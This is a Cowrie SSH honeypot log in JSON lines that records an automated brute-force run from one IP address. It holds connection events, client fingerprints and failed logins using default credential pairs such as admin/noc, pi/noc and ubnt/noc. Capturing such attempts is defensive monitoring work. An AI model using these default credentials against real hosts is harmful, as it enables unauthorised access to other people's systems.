{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55258,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a304ef11b20","protocol":"ssh","message":"New connection: 212.227.125.160:55258 (1.2.3.4:22) [session: 6a304ef11b20]","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.961563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:46.994797Z","src_ip":"212.227.125.160","session":"6a304ef11b20"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.033515Z","src_ip":"212.227.125.160","session":"68bceffc78e5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.051385Z","src_ip":"212.227.125.160","session":"6a304ef11b20"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.058218Z","src_ip":"212.227.125.160","session":"886d668fe13a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55264,"dst_ip":"1.2.3.4","dst_port":22,"session":"f044e38c2040","protocol":"ssh","message":"New connection: 212.227.125.160:55264 (1.2.3.4:22) [session: f044e38c2040]","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.088164Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55272,"dst_ip":"1.2.3.4","dst_port":22,"session":"07f5b54072a6","protocol":"ssh","message":"New connection: 212.227.125.160:55272 (1.2.3.4:22) [session: 07f5b54072a6]","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.118387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.131459Z","src_ip":"212.227.125.160","session":"f044e38c2040"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.132268Z","src_ip":"212.227.125.160","session":"f044e38c2040"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.158285Z","src_ip":"212.227.125.160","session":"07f5b54072a6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.201045Z","src_ip":"212.227.125.160","session":"7423d5b6cfe9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.216536Z","src_ip":"212.227.125.160","session":"07f5b54072a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55284,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ede08e1d8e2","protocol":"ssh","message":"New connection: 212.227.125.160:55284 (1.2.3.4:22) [session: 1ede08e1d8e2]","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.265294Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"noc","message":"login attempt [ftpuser/noc] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.319654Z","src_ip":"212.227.125.160","session":"6a304ef11b20"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.339802Z","src_ip":"212.227.125.160","session":"1ede08e1d8e2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.340336Z","src_ip":"212.227.125.160","session":"1ede08e1d8e2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.343113Z","src_ip":"212.227.125.160","session":"9b328e50cc1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55294,"dst_ip":"1.2.3.4","dst_port":22,"session":"61f186b6954c","protocol":"ssh","message":"New connection: 212.227.125.160:55294 (1.2.3.4:22) [session: 61f186b6954c]","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.394094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.469308Z","src_ip":"212.227.125.160","session":"61f186b6954c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.470162Z","src_ip":"212.227.125.160","session":"61f186b6954c"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"noc","message":"login attempt [ubnt/noc] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.555180Z","src_ip":"212.227.125.160","session":"07f5b54072a6"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"noc","message":"login attempt [ftpuser/noc] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.564748Z","src_ip":"212.227.125.160","session":"f044e38c2040"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.699628Z","src_ip":"212.227.125.160","session":"3b06b9f30165"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55296,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a9a598f2372","protocol":"ssh","message":"New connection: 212.227.125.160:55296 (1.2.3.4:22) [session: 1a9a598f2372]","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.744162Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"noc","message":"login attempt [admin/noc] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.772401Z","src_ip":"212.227.125.160","session":"1ede08e1d8e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35718,"dst_ip":"1.2.3.4","dst_port":22,"session":"f05dbfb09e69","protocol":"ssh","message":"New connection: 212.227.125.160:35718 (1.2.3.4:22) [session: f05dbfb09e69]","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.788477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.813236Z","src_ip":"212.227.125.160","session":"1a9a598f2372"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.813973Z","src_ip":"212.227.125.160","session":"1a9a598f2372"}
{"eventid":"cowrie.login.failed","username":"noc","password":"noc","message":"login attempt [noc/noc] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:47.948704Z","src_ip":"212.227.125.160","session":"61f186b6954c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.060608Z","src_ip":"212.227.125.160","session":"07f06f2c33e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55302,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dc64a66bb92","protocol":"ssh","message":"New connection: 212.227.125.160:55302 (1.2.3.4:22) [session: 2dc64a66bb92]","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.121790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.183090Z","src_ip":"212.227.125.160","session":"2dc64a66bb92"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.183816Z","src_ip":"212.227.125.160","session":"2dc64a66bb92"}
{"eventid":"cowrie.login.failed","username":"pi","password":"noc","message":"login attempt [pi/noc] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.278485Z","src_ip":"212.227.125.160","session":"1a9a598f2372"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.451906Z","src_ip":"212.227.125.160","session":"6a304ef11b20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52596,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4abf6f66b5f","protocol":"ssh","message":"New connection: 212.227.125.160:52596 (1.2.3.4:22) [session: c4abf6f66b5f]","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.500060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.579731Z","src_ip":"212.227.125.160","session":"c4abf6f66b5f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.580543Z","src_ip":"212.227.125.160","session":"c4abf6f66b5f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.699775Z","src_ip":"212.227.125.160","session":"07f5b54072a6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.708156Z","src_ip":"212.227.125.160","session":"f044e38c2040"}
{"eventid":"cowrie.login.failed","username":"student","password":"password","message":"login attempt [student/password] failed","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.734221Z","src_ip":"212.227.125.160","session":"2dc64a66bb92"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52606,"dst_ip":"1.2.3.4","dst_port":22,"session":"83778d777d4a","protocol":"ssh","message":"New connection: 212.227.125.160:52606 (1.2.3.4:22) [session: 83778d777d4a]","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.755886Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52616,"dst_ip":"1.2.3.4","dst_port":22,"session":"28cfe0594381","protocol":"ssh","message":"New connection: 212.227.125.160:52616 (1.2.3.4:22) [session: 28cfe0594381]","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.756749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.823962Z","src_ip":"212.227.125.160","session":"f05dbfb09e69"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.824648Z","src_ip":"212.227.125.160","session":"f05dbfb09e69"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.845198Z","src_ip":"212.227.125.160","session":"28cfe0594381"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.845963Z","src_ip":"212.227.125.160","session":"28cfe0594381"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T07:06:48.853450Z","src_ip":"212.227.125.160","session":"83778d777d4a"}
